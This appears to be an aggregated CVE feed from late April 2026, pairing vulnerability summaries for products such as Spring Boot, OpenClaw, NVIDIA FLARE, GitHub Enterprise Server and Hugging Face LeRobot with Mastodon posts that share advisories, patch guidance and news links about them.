An improper access control vulnerability exists in the Cisco Intersight Device Connector for Nutanix Prism Central. The service exposes an API passthrough endpoint on TCP port 7373 that is accessible within the network scope of the deployment envi...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-5944/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-67223
(7.5 HIGH)

EPSS: 0.13%

updated 2026-04-28T20:18:13.020000

1 posts

The Aranda File Server (AFS) component in Aranda Software Aranda Service Desk before 8.3.12 stores daily activity logs with predictable names in a publicly accessible directory, which allows unauthenticated remote attackers to obtain direct virtual paths of uploaded files and bypass access controls to download sensitive documents containing PII.

1 repos

https://github.com/brandonperezlara/CVE-2025-67223

thehackerwire@mastodon.social at 2026-04-29T00:15:55.000Z ##

🟠 CVE-2025-67223 - High (7.5)

The Aranda File Server (AFS) component in Aranda Software Aranda Service Desk before 8.3.12 stores daily activity logs with predictable names in a publicly accessible directory, which allows unauthenticated remote attackers to obtain direct virtua...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-67223/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-40976
(9.1 CRITICAL)

EPSS: 0.04%

updated 2026-04-28T20:11:56.713000

3 posts

In certain circumstances, Spring Boot's default web security is ineffective allowing unauthorized access to all endpoints. For an application to be vulnerable, it must: be a servlet-based web application; have no Spring Security configuration of its own and rely on the default web security filter chain; depend on spring-boot-actuator-autoconfigure; not depend on spring-boot-health. If any of the a

Matchbook3469@mastodon.social at 2026-04-29T17:44:37.000Z ##

🚨 New security advisory:

CVE-2026-40976 affects multiple systems.

• Impact: Remote code execution or complete system compromise possible
• Risk: Attackers can gain full control of affected systems
• Mitigation: Patch immediately or isolate affected systems

Full breakdown:
https://www.yazoul.net/advisory/cve/cve-2026-40976-spring-boot-bypasses-default-security

#CVE #SecurityPatching #HackerNews

##

beyondmachines1@infosec.exchange at 2026-04-29T09:01:29.000Z ##

Spring Boot Security Update Patches Critical Authentication Bypass and RCE Flaws

Spring Boot reports three vulnerabilities, including a critical authentication bypass (CVE-2026-40976) and flaws allowing session hijacking or remote code execution via timing attacks.

**If you use Spring Boot, upgrade ASAP to a patched version (4.0.6, 3.5.14, 3.4.16, 3.3.19, or 2.7.33). Until patched, restrict access to your applications from trusted networks only and disable DevTools and Actuator endpoints in production.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/spring-boot-security-update-patches-critical-authentication-bypass-and-rce-flaws-m-w-3-i-y/gD2P6Ple2L

##

thehackerwire@mastodon.social at 2026-04-28T01:00:52.000Z ##

🔴 CVE-2026-40976 - Critical (9.1)

In certain circumstances, Spring Boot's default web security is ineffective allowing unauthorized access to all endpoints. For an application to be vulnerable, it must: be a servlet-based web application; have no Spring Security configuration of i...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-40976/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-27785
(8.8 HIGH)

EPSS: 0.01%

updated 2026-04-28T20:11:56.713000

1 posts

Specific firmware versions of Milesight AIOT camera firmware contain hard-coded credentials.

thehackerwire@mastodon.social at 2026-04-28T01:01:01.000Z ##

🟠 CVE-2026-27785 - High (8.8)

Specific firmware versions of Milesight AIOT camera firmware contain hard-coded credentials.

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-27785/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24186
(8.8 HIGH)

EPSS: 0.06%

updated 2026-04-28T20:10:42.070000

2 posts

NVIDIA FLARE SDK contains a vulnerability in FOBS, where an attacker may cause deserialization of untrusted data by sending a malicious FOBS- encoded message. A successful exploit of this vulnerability might lead to code execution.

thehackerwire@mastodon.social at 2026-04-28T22:33:32.000Z ##

🟠 CVE-2026-24186 - High (8.8)

NVIDIA FLARE SDK contains a vulnerability in FOBS, where an attacker may cause deserialization of untrusted data by sending a malicious FOBS- encoded message. A successful exploit of this vulnerability might lead to code execution.

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24186/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

AAKL@infosec.exchange at 2026-04-28T16:53:25.000Z ##

Nvidia has posted two advisories:

"NVIDIA NVFlare Dashboard contains a vulnerability in the user management and authentication system where an unauthenticated attacker may cause authorization bypass through user-controlled key."

- Critical: CVE-2026-24178, CVE-2026-24186, and CVE-2026-24204: NVIDIA FLARE SDK - April 2026 https://nvidia.custhelp.com/app/answers/detail/a_id/5819

"NVIDIA NemoClaw contains a vulnerability in the sandbox environment initialization component where a remote attacker may cause improper access control by sending prompt-injected content."

- High: CVE-2026-24222 and CVE-2026-24231: https://nvidia.custhelp.com/app/answers/detail/a_id/5837 #Nvidia #infoec #vulnerability

##

CVE-2026-24178
(9.8 CRITICAL)

EPSS: 0.14%

updated 2026-04-28T20:10:42.070000

2 posts

NVIDIA NVFlare Dashboard contains a vulnerability in the user management and authentication system where an unauthenticated attacker may cause authorization bypass through user-controlled key. A successful exploit of this vulnerability may lead to privilege escalation, data tampering, information disclosure, code execution, and denial of service.

thehackerwire@mastodon.social at 2026-04-28T22:33:22.000Z ##

🔴 CVE-2026-24178 - Critical (9.8)

NVIDIA NVFlare Dashboard contains a vulnerability in the user management and authentication system where an unauthenticated attacker may cause authorization bypass through user-controlled key. A successful exploit of this vulnerability may lead to...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24178/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

AAKL@infosec.exchange at 2026-04-28T16:53:25.000Z ##

Nvidia has posted two advisories:

"NVIDIA NVFlare Dashboard contains a vulnerability in the user management and authentication system where an unauthenticated attacker may cause authorization bypass through user-controlled key."

- Critical: CVE-2026-24178, CVE-2026-24186, and CVE-2026-24204: NVIDIA FLARE SDK - April 2026 https://nvidia.custhelp.com/app/answers/detail/a_id/5819

"NVIDIA NemoClaw contains a vulnerability in the sandbox environment initialization component where a remote attacker may cause improper access control by sending prompt-injected content."

- High: CVE-2026-24222 and CVE-2026-24231: https://nvidia.custhelp.com/app/answers/detail/a_id/5837 #Nvidia #infoec #vulnerability

##

CVE-2026-24231
(6.3 MEDIUM)

EPSS: 0.01%

updated 2026-04-28T20:10:42.070000

1 posts

NVIDIA NemoClaw contains a vulnerability in the validateEndpointUrl() SSRF protection component, where an attacker could cause a server-side request forgery by supplying a crafted endpoint URL referencing the 0.0.0.0/8 address range through a blueprint configuration file or CLI flag. A successful exploit of this vulnerability may lead to information disclosure.

AAKL@infosec.exchange at 2026-04-28T16:53:25.000Z ##

Nvidia has posted two advisories:

"NVIDIA NVFlare Dashboard contains a vulnerability in the user management and authentication system where an unauthenticated attacker may cause authorization bypass through user-controlled key."

- Critical: CVE-2026-24178, CVE-2026-24186, and CVE-2026-24204: NVIDIA FLARE SDK - April 2026 https://nvidia.custhelp.com/app/answers/detail/a_id/5819

"NVIDIA NemoClaw contains a vulnerability in the sandbox environment initialization component where a remote attacker may cause improper access control by sending prompt-injected content."

- High: CVE-2026-24222 and CVE-2026-24231: https://nvidia.custhelp.com/app/answers/detail/a_id/5837 #Nvidia #infoec #vulnerability

##

CVE-2026-3893
(9.4 CRITICAL)

EPSS: 0.06%

updated 2026-04-28T20:10:23.367000

1 posts

The Carlson VASCO-B GNSS Receiver lacks an authentication mechanism, allowing an attacker with network access to directly access and modify its configuration and operational functions without needing credentials.

thehackerwire@mastodon.social at 2026-04-28T22:31:41.000Z ##

🔴 CVE-2026-3893 - Critical (9.4)

The Carlson VASCO-B GNSS Receiver lacks an authentication mechanism,
allowing an attacker with network access to directly access and modify
its configuration and operational functions without needing credentials.

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-3893/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41386
(9.1 CRITICAL)

EPSS: 0.03%

updated 2026-04-28T20:10:23.367000

1 posts

OpenClaw before 2026.3.22 contains a privilege escalation vulnerability where bootstrap setup codes are not bound to intended device roles and scopes during pairing. Attackers can exploit this during first-use device pairing to escalate privileges beyond their intended role and scope.

thehackerwire@mastodon.social at 2026-04-28T22:30:45.000Z ##

🔴 CVE-2026-41386 - Critical (9.1)

OpenClaw before 2026.3.22 contains a privilege escalation vulnerability where bootstrap setup codes are not bound to intended device roles and scopes during pairing. Attackers can exploit this during first-use device pairing to escalate privileges...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41386/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41395
(7.5 HIGH)

EPSS: 0.02%

updated 2026-04-28T20:10:23.367000

1 posts

OpenClaw before 2026.3.28 contains a webhook replay vulnerability in Plivo V3 signature verification that canonicalizes query ordering for signatures but hashes raw URLs for replay detection. Attackers can reorder query parameters to bypass replay cache detection and trigger duplicate voice-call processing with a captured valid signed webhook.

thehackerwire@mastodon.social at 2026-04-28T22:00:12.000Z ##

🟠 CVE-2026-41395 - High (7.5)

OpenClaw before 2026.3.28 contains a webhook replay vulnerability in Plivo V3 signature verification that canonicalizes query ordering for signatures but hashes raw URLs for replay detection. Attackers can reorder query parameters to bypass replay...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41395/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41404
(8.8 HIGH)

EPSS: 0.07%

updated 2026-04-28T20:10:23.367000

1 posts

OpenClaw before 2026.3.31 contains an incomplete scope-clearing vulnerability in trusted-proxy authentication mode that allows operator.admin privilege escalation. Attackers can exploit this by declaring operator scopes on non-Control-UI clients, allowing self-declared scopes to persist on identity-bearing authentication paths and escalate privileges.

thehackerwire@mastodon.social at 2026-04-28T21:50:08.000Z ##

🟠 CVE-2026-41404 - High (8.8)

OpenClaw before 2026.3.31 contains an incomplete scope-clearing vulnerability in trusted-proxy authentication mode that allows operator.admin privilege escalation. Attackers can exploit this by declaring operator scopes on non-Control-UI clients, ...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41404/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41399
(7.5 HIGH)

EPSS: 0.05%

updated 2026-04-28T20:10:23.367000

1 posts

OpenClaw before 2026.3.28 accepts unbounded concurrent unauthenticated WebSocket upgrades without pre-authentication budget allocation. Unauthenticated network attackers can exhaust socket and worker capacity to disrupt WebSocket availability for legitimate clients.

thehackerwire@mastodon.social at 2026-04-28T21:49:58.000Z ##

🟠 CVE-2026-41399 - High (7.5)

OpenClaw before 2026.3.28 accepts unbounded concurrent unauthenticated WebSocket upgrades without pre-authentication budget allocation. Unauthenticated network attackers can exhaust socket and worker capacity to disrupt WebSocket availability for ...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41399/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41912
(7.6 HIGH)

EPSS: 0.03%

updated 2026-04-28T20:10:23.367000

1 posts

OpenClaw before 2026.4.8 contains a server-side request forgery policy bypass vulnerability allowing attackers to trigger navigations bypassing normal SSRF checks. Attackers can exploit browser interactions to bypass SSRF protections and access restricted resources.

thehackerwire@mastodon.social at 2026-04-28T21:14:03.000Z ##

🟠 CVE-2026-41912 - High (7.6)

OpenClaw before 2026.4.8 contains a server-side request forgery policy bypass vulnerability allowing attackers to trigger navigations bypassing normal SSRF checks. Attackers can exploit browser interactions to bypass SSRF protections and access re...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41912/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41405
(7.5 HIGH)

EPSS: 0.14%

updated 2026-04-28T20:10:23.367000

1 posts

OpenClaw before 2026.3.31 parses MS Teams webhook request bodies before performing JWT validation, allowing unauthenticated attackers to trigger resource exhaustion. Remote attackers can send malicious Teams webhook payloads to exhaust server resources by bypassing authentication checks.

thehackerwire@mastodon.social at 2026-04-28T21:13:54.000Z ##

🟠 CVE-2026-41405 - High (7.5)

OpenClaw before 2026.3.31 parses MS Teams webhook request bodies before performing JWT validation, allowing unauthenticated attackers to trigger resource exhaustion. Remote attackers can send malicious Teams webhook payloads to exhaust server reso...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41405/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-42426
(8.8 HIGH)

EPSS: 0.03%

updated 2026-04-28T20:10:23.367000

1 posts

OpenClaw before 2026.4.8 contains an improper authorization vulnerability where the node.pair.approve method accepts operator.write scope instead of the narrower operator.pairing scope, allowing unprivileged users to approve node pairing. Attackers with operator.write permissions can bypass pairing approval restrictions to gain unauthorized access to exec-capable nodes.

thehackerwire@mastodon.social at 2026-04-28T21:02:23.000Z ##

🟠 CVE-2026-42426 - High (8.8)

OpenClaw before 2026.4.8 contains an improper authorization vulnerability where the node.pair.approve method accepts operator.write scope instead of the narrower operator.pairing scope, allowing unprivileged users to approve node pairing. Attacker...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-42426/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-42423
(7.5 HIGH)

EPSS: 0.04%

updated 2026-04-28T20:10:23.367000

1 posts

OpenClaw before 2026.4.8 contains an approval-timeout fallback mechanism that bypasses strictInlineEval explicit-approval requirements on gateway and node exec hosts. Attackers can exploit this timeout fallback to execute inline eval commands that should require explicit user approval, circumventing the intended security boundary.

thehackerwire@mastodon.social at 2026-04-28T21:00:33.000Z ##

🟠 CVE-2026-42423 - High (7.5)

OpenClaw before 2026.4.8 contains an approval-timeout fallback mechanism that bypasses strictInlineEval explicit-approval requirements on gateway and node exec hosts. Attackers can exploit this timeout fallback to execute inline eval commands that...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-42423/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-40473
(8.8 HIGH)

EPSS: 0.11%

updated 2026-04-28T19:43:05.663000

1 posts

The camel-mina component's MinaConverter.toObjectInput(IoBuffer) type converter wraps an IoBuffer in a java.io.ObjectInputStream without applying any ObjectInputFilter or class-loading restrictions. When a Camel route uses camel-mina as a TCP or UDP consumer and requests conversion to ObjectInput (for example via getBody(ObjectInput.class) or @Body ObjectInput), an attacker sending a crafted seria

1 repos

https://github.com/dinosn/apache-camel

Matchbook3469@mastodon.social at 2026-04-29T23:29:05.000Z ##

🟠 New security advisory:

CVE-2026-40473 affects multiple systems.

• Impact: Significant security breach potential
• Risk: Unauthorized access or data exposure
• Mitigation: Apply patches within 24-48 hours

Full breakdown:
https://www.yazoul.net/advisory/cve/cve-2026-40473-camel-mina-unauthenticated-rce

#InfoSec #VulnerabilityManagement #CyberSec

##

CVE-2026-3854
(8.8 HIGH)

EPSS: 0.35%

updated 2026-04-28T19:37:39.507000

34 posts

An improper neutralization of special elements vulnerability was identified in GitHub Enterprise Server that allowed an attacker with push access to a repository to achieve remote code execution on the instance. During a git push operation, user-supplied push option values were not properly sanitized before being included in internal service headers. Because the internal header format used a delim

4 repos

https://github.com/lysophavin18/CVE-2026-3854-PoC

https://github.com/simondankelmann/cve-2026-3854-test

https://github.com/5kr1pt/CVE-2026-3854

https://github.com/LACHHAB-Anas/Exploit_CVE-2026-3854

mackuba@martianbase.net at 2026-04-29T20:47:26.000Z ##

Uh… this seems bad https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854

##

mastokukei@social.josko.org at 2026-04-29T18:01:59.000Z ##

Blip blop, I'm a #mastobot.
Here is a summary (in beta) of the latest posts in #programmingAtKukei https://masto.kukei.eu/browse/programming category:
- **Zed 1.0 release**: Zed editor reaches 1.0 milestone, marketed as an AI-native editor with multi-agent support (Claude, Codex, OpenCode).
- **GitHub controversies**: GitHub outages, RCE vulnerability (CVE-2026-3854), and projects migrating away (e.g., Ghostty, BookStack to Codeberg).
- **AI coding tools and incidents**: Claude Code deletes [1/2]

##

mastokukei@social.josko.org at 2026-04-29T18:01:48.000Z ##

like GitHub Copilot and its shift to usage-based billing

2. **GitHub Issues and Alternatives**
- Frequent GitHub outages and reliability concerns
- Projects migrating from GitHub to alternatives like Codeberg and Radicle
- Security vulnerabilities (e.g., CVE-2026-3854) and criticism from developers

3. **Energy and Sustainability Innovations**
- Sodium-ion batteries becoming mainstream (CATL’s 60 GWh deal)
- Renewable energy advancements (solar, wind, and [2/4]

##

CuratedHackerNews@mastodon.social at 2026-04-29T16:21:04.000Z ##

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown

https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854

#github

##

beyondmachines1 at 2026-04-29T15:01:43.707Z ##

GitHub Patches Critical RCE Vulnerability in GitHub.com and GitHub Enterprise Server

GitHub patched a critical RCE vulnerability (CVE-2026-3854) in its internal git infrastructure that allowed authenticated users to compromise backend servers and access millions of repositories.

**If you run GitHub Enterprise Server (version 3.19.1 or earlier), upgrade immediately to a patched version (3.14.25, 3.15.20, 3.16.16, 3.17.13, 3.18.8, 3.19.4, 3.20.0, or later) since nearly 90% of instances are still unpatched. Also check your audit logs at `/var/log/github-audit.log` for push operations with unusual special characters in option values to spot any exploitation attempts; if you use GitHub.com or GitHub Enterprise Cloud, no action is needed since GitHub already fixed it.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/github-patches-critical-rce-vulnerability-in-github-com-and-github-enterprise-server-r-x-e-8-5/gD2P6Ple2L

##

nixCraft@mastodon.social at 2026-04-29T14:31:29.000Z ##

With Microsoft pushing AI slop & bots hard into every product without any verification and accountability I am not surprised bug like this now exists. Critical GitHub RCE bug exposed millions of repositories including private one that business users like to keep their code private. GitHub Enterprise Server that allowed an attacker with push access to a repository to achieve remote code execution on the instance https://nvd.nist.gov/vuln/detail/CVE-2026-3854

##

undercodenews@mastodon.social at 2026-04-29T13:00:44.000Z ##

GitHub Emergency Patch Stops Critical RCE Flaw That Could Have Exposed Millions of Private Repositories

Introduction GitHub has quietly prevented what may have become one of the most dangerous software supply chain incidents in recent years. In early March 2026, the company patched a critical remote code execution vulnerability tracked as CVE-2026-3854, a flaw that researchers say could have given attackers access to millions of private repositories worldwide. The…

https://undercodenews.com/github-emergency-patch-stops-critical-rce-flaw-that-could-have-exposed-millions-of-private-repositories/?utm_source=mastodon&utm_medium=jetpack_social

##

F30@chaos.social at 2026-04-29T11:58:04.000Z ##

"A single git push command was enough to exploit a flaw in GitHub's internal protocol and achieve code execution on backend infrastructure.
[…]
This research was made possible by AI-augmented reverse engineering tooling, particularly IDA MCP, which allowed us to rapidly analyze compiled binaries and reconstruct internal protocols at a speed that would not have been feasible manually."
https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854

##

mackuba@martianbase.net at 2026-04-29T20:47:26.000Z ##

Uh… this seems bad https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854

##

CuratedHackerNews@mastodon.social at 2026-04-29T16:21:04.000Z ##

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown

https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854

#github

##

beyondmachines1@infosec.exchange at 2026-04-29T15:01:43.000Z ##

GitHub Patches Critical RCE Vulnerability in GitHub.com and GitHub Enterprise Server

GitHub patched a critical RCE vulnerability (CVE-2026-3854) in its internal git infrastructure that allowed authenticated users to compromise backend servers and access millions of repositories.

**If you run GitHub Enterprise Server (version 3.19.1 or earlier), upgrade immediately to a patched version (3.14.25, 3.15.20, 3.16.16, 3.17.13, 3.18.8, 3.19.4, 3.20.0, or later) since nearly 90% of instances are still unpatched. Also check your audit logs at `/var/log/github-audit.log` for push operations with unusual special characters in option values to spot any exploitation attempts; if you use GitHub.com or GitHub Enterprise Cloud, no action is needed since GitHub already fixed it.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/github-patches-critical-rce-vulnerability-in-github-com-and-github-enterprise-server-r-x-e-8-5/gD2P6Ple2L

##

nixCraft@mastodon.social at 2026-04-29T14:31:29.000Z ##

With Microsoft pushing AI slop & bots hard into every product without any verification and accountability I am not surprised bug like this now exists. Critical GitHub RCE bug exposed millions of repositories including private one that business users like to keep their code private. GitHub Enterprise Server that allowed an attacker with push access to a repository to achieve remote code execution on the instance https://nvd.nist.gov/vuln/detail/CVE-2026-3854

##

F30@chaos.social at 2026-04-29T11:58:04.000Z ##

"A single git push command was enough to exploit a flaw in GitHub's internal protocol and achieve code execution on backend infrastructure.
[…]
This research was made possible by AI-augmented reverse engineering tooling, particularly IDA MCP, which allowed us to rapidly analyze compiled binaries and reconstruct internal protocols at a speed that would not have been feasible manually."
https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854

##

tisba@ruby.social at 2026-04-29T10:11:40.000Z ##

Aside from the abysimal uptime Github currently presents, they -also- had one of the worst security incidents you can think of: An RCE via a simple “git push” with total loss of tenant isolation (via https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854).

If GitHub weren't such a central piece of infrastructure, the current situation would be disastrous for their business.

I am afraid this is just the beginning. #github #security

##

benzogaga33@mamot.fr at 2026-04-29T09:40:03.000Z ##

Cette faille GitHub est exploitable par un simple Git Push (CVE-2026-3854) https://www.it-connect.fr/cette-faille-github-est-exploitable-par-un-simple-git-push-cve-2026-3854/ #ActuCybersécurité #Cybersécurité #Vulnérabilité #GitHub

##

hnbest@mastodon.social at 2026-04-29T08:00:02.000Z ##

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown
https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854
Discussion: https://news.ycombinator.com/item?id=47936479

##

offseq@infosec.exchange at 2026-04-29T07:30:27.000Z ##

⚠️ CRITICAL: CVE-2026-3854 lets users with push access run arbitrary code on GitHub backend servers. Impacts GitHub.com & Enterprise Server. GitHub.com patched 2026-03-04; ES patch 2026-03-10. Patch ASAP! No wild exploits found. https://radar.offseq.com/threat/critical-github-vulnerability-exposed-millions-of--29b3abff #OffSeq #GitHub #Infosec

##

hn250@social.lansky.name at 2026-04-29T02:10:12.000Z ##

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown

Link: https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854
Discussion: https://news.ycombinator.com/item?id=47936479

##

wwahammy@treehouse.systems at 2026-04-29T01:20:29.000Z ##

There should be a "but the service is never up to be exploited" reducer on the CVE score.
https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854

##

jschauma@mstdn.social at 2026-04-29T00:36:54.000Z ##

Question about the GitHub RCE:

https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854 says GHES patches were _released_ on 03/10.

https://github.blog/security/securing-the-git-push-pipeline-responding-to-a-critical-remote-code-execution-vulnerability/ says "we _prepared_ patches [...] and published CVE-2026-3854. These are _available today_".

So were GHES patches made available to customers at the time of CVE publication or only today, 1.5 months laster?

##

obivan@infosec.exchange at 2026-04-28T21:53:56.000Z ##

Wiz Research uncovers Remote Code Execution in GitHub.com and GitHub Enterprise Server (CVE-2026-3854) https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854

##

hackersnews@mastodon.cesium.pw at 2026-04-28T20:30:11.000Z ##

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown
https://news.ycombinator.com/item?id=47936479

#hackernews #tech

##

lobsters@mastodon.social at 2026-04-28T19:55:16.000Z ##

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown https://lobste.rs/s/8fxgx7 #security #vibecoding
https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854

##

hn100@social.lansky.name at 2026-04-28T19:45:08.000Z ##

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown

Link: https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854
Discussion: https://news.ycombinator.com/item?id=47936479

##

hn50@social.lansky.name at 2026-04-28T19:00:06.000Z ##

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown

Link: https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854
Discussion: https://news.ycombinator.com/item?id=47936479

##

newsycombinator@framapiaf.org at 2026-04-28T19:00:10.000Z ##

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown
Link: https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854
Comments: https://news.ycombinator.com/item?id=47936479

##

Xavier@infosec.exchange at 2026-04-28T18:59:08.000Z ##

@GossiTheDog Here's a non-Twitter link: https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854

##

blainsmith@fosstodon.org at 2026-04-28T18:58:41.000Z ##

HAHAHAHAHHAHAHAHAHAHAH https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854

##

GossiTheDog@cyberplace.social at 2026-04-28T18:56:22.000Z ##

Wiz got RCE on the cloud version of Github.com and access to every customer environment.

To do this they just reversed the on prem version and found a simple vuln.

https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854

##

hackerworkspace@infosec.exchange at 2026-04-28T18:27:48.000Z ##

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown | Wiz Blog

https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854

Read on HackerWorkspace: https://hackerworkspace.com/article/github-rce-vulnerability-cve-2026-3854-breakdown-wiz-blog

#aisecurity #vulnerability #exploit

##

ngate@mastodon.social at 2026-04-28T18:23:21.000Z ##

🎉 BREAKING NEWS: #Hackers discover GitHub's secret Easter egg, allowing anyone with a pulse to play "Command & Conquer" on their backend servers! 😂 A riveting tale of how to hack into the Matrix using nothing but a 'git' command — surely, Neo is quaking in his boots. 🕶️
https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854 #GitHub #EasterEgg #CommandAndConquer #HackingIntoTheMatrix #NeoQuaking #HackerNews #ngated

##

h4ckernews@mastodon.social at 2026-04-28T18:23:16.000Z ##

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown

https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854

#HackerNews #GitHub #RCE #Vulnerability #CVE-2026-3854 #Cybersecurity #Vulnerability #Analysis #InfoSec

##

CuratedHackerNews@mastodon.social at 2026-04-28T17:35:05.000Z ##

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown

https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854

#github

##

bortzmeyer@mastodon.gougere.fr at 2026-04-28T16:53:20.000Z ##

Beaucoup de gens vont sans doute résumer la faille de sécurité CVE-2026-3854 en « Mon Dieu, la totalité des logiciels hébergés sur GitHub ont peut-être été compromis ».

Mais, en fait, c'était déjà possible, Microsoft (propriétaire de GitHub) pouvait déjà tout modifier.

Tout ce qu'a permis CVE-2026-3854, si des gens l'ont exploité, c'est de démocratiser cette possibilité, en la rendant accessible à tous les gens ayant un compte GitHub.

https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854

##

CVE-2026-25874
(9.8 CRITICAL)

EPSS: 0.11%

updated 2026-04-28T19:01:40.377000

6 posts

LeRobot through 0.5.1 contains an unsafe deserialization vulnerability in the async inference pipeline where pickle.loads() is used to deserialize data received over unauthenticated gRPC channels without TLS in the policy server and robot client components. An unauthenticated network-reachable attacker can achieve arbitrary code execution on the server or client by sending a crafted pickle payload

beyondmachines1 at 2026-04-29T13:01:43.600Z ##

Critical Unpatched RCE Vulnerability in Hugging Face LeRobot Robotics Platform

Hugging Face's LeRobot robotics platform contains a critical unpatched vulnerability (CVE-2026-25874) that allows unauthenticated remote code execution via unsafe pickle deserialization. Attackers can exploit exposed gRPC endpoints to take full control of robotics servers and connected hardware.

**If you're using Hugging Face LeRobot, make sure all robot devices and servers are isolated from the internet and accessible only from trusted networks. Until version 0.6.0 is released with a fix for CVE-2026-25874, run LeRobot as a non-root user inside restricted containers, and monitor for unusual processes or outbound traffic.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/critical-unpatched-rce-vulnerability-in-hugging-face-lerobot-robotics-platform-z-j-o-7-g/gD2P6Ple2L

##

beyondmachines1@infosec.exchange at 2026-04-29T13:01:43.000Z ##

Critical Unpatched RCE Vulnerability in Hugging Face LeRobot Robotics Platform

Hugging Face's LeRobot robotics platform contains a critical unpatched vulnerability (CVE-2026-25874) that allows unauthenticated remote code execution via unsafe pickle deserialization. Attackers can exploit exposed gRPC endpoints to take full control of robotics servers and connected hardware.

**If you're using Hugging Face LeRobot, make sure all robot devices and servers are isolated from the internet and accessible only from trusted networks. Until version 0.6.0 is released with a fix for CVE-2026-25874, run LeRobot as a non-root user inside restricted containers, and monitor for unusual processes or outbound traffic.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/critical-unpatched-rce-vulnerability-in-hugging-face-lerobot-robotics-platform-z-j-o-7-g/gD2P6Ple2L

##

hackerworkspace@infosec.exchange at 2026-04-29T04:16:35.000Z ##

Critical Unpatched Flaw Leaves Hugging Face LeRobot Open to Unauthenticated RCE

https://thehackernews.com/2026/04/critical-cve-2026-25874-leaves-hugging.html

Read on HackerWorkspace: https://hackerworkspace.com/article/critical-unpatched-flaw-leaves-hugging-face-lerobot-open-to-unauthenticated-rce

#cybersecurity #aisecurity #vulnerability

##

netsecio@mastodon.social at 2026-04-28T16:41:17.000Z ##

📰 Critical Unpatched RCE Flaw in Hugging Face's LeRobot AI Platform Puts Robotics Systems at Risk

🚨 CRITICAL FLAW: Unpatched RCE (CVE-2026-25874, CVSS 9.3) in Hugging Face's LeRobot AI platform. Unsafe deserialization allows unauthenticated attackers to execute code. #CVE202625874 #HuggingFace #AI #RCE

🔗 https://cyber.netsecops.io

##

mttaggart@infosec.exchange at 2026-04-28T13:05:15.000Z ##

May I suggest...not exposing your robot control plane to the internet

https://www.resecurity.com/blog/article/cve-2026-25874-hugging-face-lerobot-unauthenticated-rce-via-pickle-deserialization

##

jbhall56@infosec.exchange at 2026-04-28T12:29:27.000Z ##

